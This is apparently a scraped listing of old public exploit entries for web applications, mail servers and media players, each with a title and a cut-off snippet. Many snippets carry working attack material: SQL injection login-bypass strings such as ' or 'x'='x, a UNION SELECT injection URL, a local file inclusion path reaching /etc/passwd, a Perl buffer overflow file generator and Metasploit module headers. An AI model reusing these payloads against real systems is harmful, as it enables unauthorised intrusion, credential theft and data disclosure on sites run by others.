Golabi CMS <= 1.0.1 Session Poisoning Vulnerability

No description provided by source. -------------------------------------------------------------------------------- \ \ / \ | | / \ /\ \ \ \ | |/ /\ \ / \ / / | | \ | | // / / \ / | \ | / // /| | \ /|| / / | /| /\ / \ / / / // / /// /...

MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability

No description provided by source. Script : MyEvent Version : 1.2 Risk : High Class : Remote Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends Google look for : = MyEvent 1.2 or /calendar/myevent.php...

UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)

$Id: imapuwlsub.rb 8932 2010-03-26 19:00:23Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

MS03-046 Exchange 2000 XEXCH50 Heap Overflow

$Id: ms03046exchange2000xexch50.rb 7724 2009-12-06 05:50:37Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

Ignition 1.2 - comment Remote Code Injection

Ignition 1.2 - comment Remote Code Injection Ignition Remote Code Execution AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : http://IrCrash.com My Official WebSite : http://R3dW0rm.ir IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm Sina Yazdanmehr Downlo...

EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflows (PoC)

EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflows PoC !/usr/bin/python EmbedThis Appweb v3.0B.2-4 Multiple Remote Buffer Overflow PoCs Found By: DrIDE Based On: http://www.milw0rm.com/exploits/9411 Tested On: XP SP2 Notes: These don't seem to actually take down the server, they cause a...

AW BannerAd - Authentication Bypass

AW BannerAd - Authentication Bypass AW-BannerAd Login ByPass By JxE-13 Ro0T-MaFia Sistema : AW-BannerAd,Asp Scripts Archivo : adv/admin/index.asp User&Pass:' or 'x'='x :' or 'x'='x milw0rm.com 2009-08-03...

SimpleLoginSys 0.5 - Authentication Bypass

SimpleLoginSys v0.5 Auth Bypass SQL Injection Vulnerability + Discovered By SirGod + http://insecurity-ro.org + http://h4cky0u.org + download : http://sourceforge.net/projects/simplesiteadmin/files/simpleloginsys/SimpleLoginSys%20v0.5/simpleloginsys0.5.zip/download + SQL Injection Auth Bypass -...

Limny 1.01 - Authentication Bypass

Limny 1.01 Auth Bypass SQL Injection Vulnerability + Discovered By SirGod + http://insecurity-ro.org + http://h4cky0u.org + Script Homepage : http://www.limny-project.com/ + SQL Injection Vulnerability - Notes : magicquotesgpc = off - Vulnerable code in includes/functions.php...

PEamp 1.02b - &#039;.m3u&#039; Local Buffer Overflow (PoC)

PEamp 1.02b .M3U File Local Stack Overflow POC Download: http://files.brothersoft.com/mp3audio/players/mp3player.zip my $chars= "A" x 5000; my $file="dz.m3u"; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $chars; close$FILE; print "$file has been created \n"; usage: amp.exe=...

212Cafe WebBoard 2.90 Beta - Remote File Disclosure

Webboard = v.2.90 beta Remote File Disclosure Vulnerability ============================================================= Author: MrDoug Email: mrdoug13 at gmail dot com Greetz to all my friends ============================================================= There are 3 vulnerable calls to fopen in...

Job Script 2.0 - Arbitrary Change Admin Password

Job Script V2.0 - Job Board Software change pasword admin admin :[email protected] Change password Cod3d By:TiGeR-dZ ;Script:Job Script V2.0 - Job Board Software Download:http://www.jobscript.net/job-board-software/ Mail:[email protected] milw0rm.com 2009-05-07...

TotalCalendar 2.4 - inc_dir Remote File Inclusion

TotalCalendar 2.4 - incdir Remote File Inclusion //// //1 9 2 3 T U R K - G R U P// //// //-----------------------------------------------------------------------// Home Page : "http://www.simpoe.com/" Download : "http://www.simpoe.com/calendre/TotalCalendar2.4.zip" ScriptName: "Simpoe Event...

Access2asp - imageLibrar Arbitrary File Upload

Access2asp - imageLibrar Arbitrary File Upload || || | || o,7 || . o7 || 4||| ow, : / / . upload shell Found by ::: mr.al7rbi Contact ::: n16 at live.com my Group ::: islam-defenders Team + Title: imageLibrary dork inurl:"defaultImage.asp" + EXPLOITS:...

SkyPortal WebLinks 0.12 - Contents Change

SkyPortal WebLinks 0.12 - Contents Change @=======================================@ ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== @=======================================@ @=Author : ByALBAYX @=Website : WWW.C4TEAM.ORG @=From : Turkish @=======================================@ @=Script :SkyPortal...

Qwerty CMS - id SQL Injection

Qwerty CMS - id SQL Injection QWERTY CMS lite - SQL INJ Found: b3 from GraBBerZ.com = Injection in index.php variable: id http://site/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5 = Administrator Table: rkh8t5po Columns: secret873ktlW,pass459khyf Column with pass: pass459khyf Admin CP:...

Grestul 1.x - Cookie Authentication Bypass

Grestul 1.x - Cookie Authentication Bypass Grestul Sql Injection By Cookie bypass Autore: x0r Email: [email protected] Site: http://w00tz0ne.org Let's Go! \admin\login.php : $username = SafeAddSlashes$POST'username'; $passcode = SafeAddSlashesmd5$POST'passcode'; $time = time; $check =...

ideacart 0.02 - Local File Inclusion / SQL Injection

IdeaCart 0.02 LFI/SQL Multiple Remote Vulnerabilities Author: nuclear LFI: http://127.0.0.1/index.php?page=../../../../../../../../../etc/passwd%00 SQL: http://127.0.0.1/secure/index.php?cID=1%20union%20select%201,2,3,4,5,6,@@version,8%23 notes: get ur sql result at: YOUR ORDER DETAILS 5.0.67 @ b...

ItCMS 2.1a - Authentication Bypass

. . . / | || | / / || | / / \ \ \ \ | |/ \ / |/ \ \ \ | \ \ \ /| | /| | / | | | / // \ / / | | | Y \ \ | || /|| /\ |\ /| || / / / / / / / / / --++++++-- --+++ IT!CMS = vers. SQL Injection Vulnerability +++-- --++++++-- + Discovered by: certaindeath + Exploit: simple SQL injection +...

Destiny Media Player 1.61 - .lst Local Buffer Overflow (2)

Destiny Media Player 1.61 - .lst Local Buffer Overflow 2 !/user/bin/perl Destiny Media Player 1.61 Local BoF Code Exploit Coded by : sCORPINo Snoop Security Researching Committe originally discovered by: Encrypt3d.M!nd windows/exec - 142 bytes http://www.metasploit.com Encoder: x86/fnstenvmov...